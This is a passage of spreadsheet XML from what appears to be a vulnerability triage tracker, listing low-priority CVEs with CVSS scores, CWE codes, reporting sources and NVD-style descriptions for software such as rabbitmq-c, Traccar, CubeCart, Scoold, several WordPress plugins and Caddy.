          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92757</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25261</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>Memory corruption while processing rear sensor IOCTL calls.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25261</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44235</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized HEADER or METHOD frame during client login and cause unsigned size_t underflow in amqp_handle_input() in librabbitmq/amqp_connection.c. The parser subtracts HEADER_SIZE, fixed per-frame fields, and FOOTER_SIZE from state-&gt;target_size without first checking the minimum frame length. The wrapped encoded.len value is passed through amqp_decode_properties() to amqp_decode_table_internal(), where it defeats bounds checks and causes an out-of-bounds read and process crash. An on-path attacker can also trigger the issue when AMQP traffic is not protected by TLS with certificate validation. The demonstrated impact is denial of service, with no reliable memory disclosure or code execution shown. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44235</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52852</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Traccar is an open source GPS tracking system. Prior to 6.14.0, an authenticated user with permission to manage groups and request reports can create a cyclic group-parent hierarchy and request a trips or stops report for a device in that hierarchy. org.traccar.api.resource.GroupResource permits the parent cycle, while org.traccar.helper.model.AttributeUtil.lookup follows group parents without cycle detection, a visited set, or a depth limit. The storage-backed lookup reached through TripsConfig. and ReportUtils.slowTripsAndStops never terminates, pins a Jetty worker at high CPU after the client disconnects, and can exhaust the web/API worker pool when requests are repeated. The position-ingestion cache-backed path is not part of the confirmed affected scope. This issue is fixed in 6.14.0.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52852</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54648</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the GDPR tools in admin/sources/customers.gdpr.inc.php rely on page-level CC_PERM_READ access and do not require CC_PERM_DELETE for the purge, no_order_purge, or delete_guests commands. An authenticated administrator with read-only customer privileges can invoke these backend actions directly to bypass interface restrictions and irreversibly delete customer records, accounts without orders, or guest accounts, compromising data integrity and availability. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54648</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54676</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Scoold is a Q&amp;A and a knowledge sharing platform for teams. Prior to 1.69.0, users with personal API tokens can retrieve replies from questions in private spaces they cannot access because src/main/java/com/erudika/scoold/api/ApiController.java in ApiController.getPostReplies() does not apply canAccessSpace before returning data from GET /api/posts/{id}/answers. The issue is reachable when scoold.api_user_access_enabled and scoold.api_enabled are true and a token holder knows or enumerates a private question identifier. Under those conditions, the question endpoint can deny access while the answers endpoint returns the private reply bodies, exposing confidential team or project discussions. This issue is fixed in version 1.69.0.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54676</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54677</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>Scoold is a Q&amp;A and a knowledge sharing platform for teams. Prior to 1.69.0, authenticated users who are not members of a private space can create content in questions belonging to that space because src/main/java/com/erudika/scoold/controllers/QuestionController.java in QuestionController.reply() and src/main/java/com/erudika/scoold/controllers/CommentController.java in CommentController.createAjax() do not apply the canAccessSpace authorization check used by the question read path. With scoold.is_default_space_public set to false and private spaces in use, a user with a valid session and a known or enumerable question identifier can send requests to POST /question/{id} and POST /comment, causing replies and comments to be stored in a thread the user cannot read. This permits unauthorized modification of private discussions and can trigger notifications that reveal the existence or metadata of private activity. This issue is fixed in version 1.69.0.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54677</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66572</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetBlog &lt;= 2.4.10 versions.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66572</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66573</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetTabs &lt;= 2.3.3.1 versions.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66573</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66574</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Element Pack Elementor Addons &lt;= 8.8.3 versions.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66574</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66576</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetBlocks For Elementor &lt;= 1.5.2 versions.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66576</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66577</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetSearch &lt;= 3.6.3 versions.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66577</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66578</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in PropertyHive &lt;= 2.2.6 versions.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66578</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66579</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetElements For Elementor &lt;= 2.9.2.1 versions.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66579</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66617</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66617</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67071</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>psirt@hcl.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>HCL DevOps Deploy / HCL Launch is susceptible to an information disclosure vulnerability when processing redacted property values. If a deployment is configured with a secure property that starts with certain non-ASCII characters, the redaction engine may fail to mask subsequent ASCII secure values embedded inside insecure properties.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67071</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77281</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-770, CWE-94</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Caddy is an extensible server platform that uses TLS by default. In version 2.11.3 and earlier, three configuration-dependent weaknesses affect the handler and placeholder layer. In modules/caddyhttp/rewrite/rewrite.go, Rewrite.Rewrite() can pass attacker-controlled replacement bytes through buildQueryString for a second placeholder expansion when a rewrite URI ends with a literal question mark, allowing injected environment or request-variable placeholders to disclose data and, when the file provider is registered, allowing injected file placeholders to disclose readable files. The  issue is fixed in version 2.11.4.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77281</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
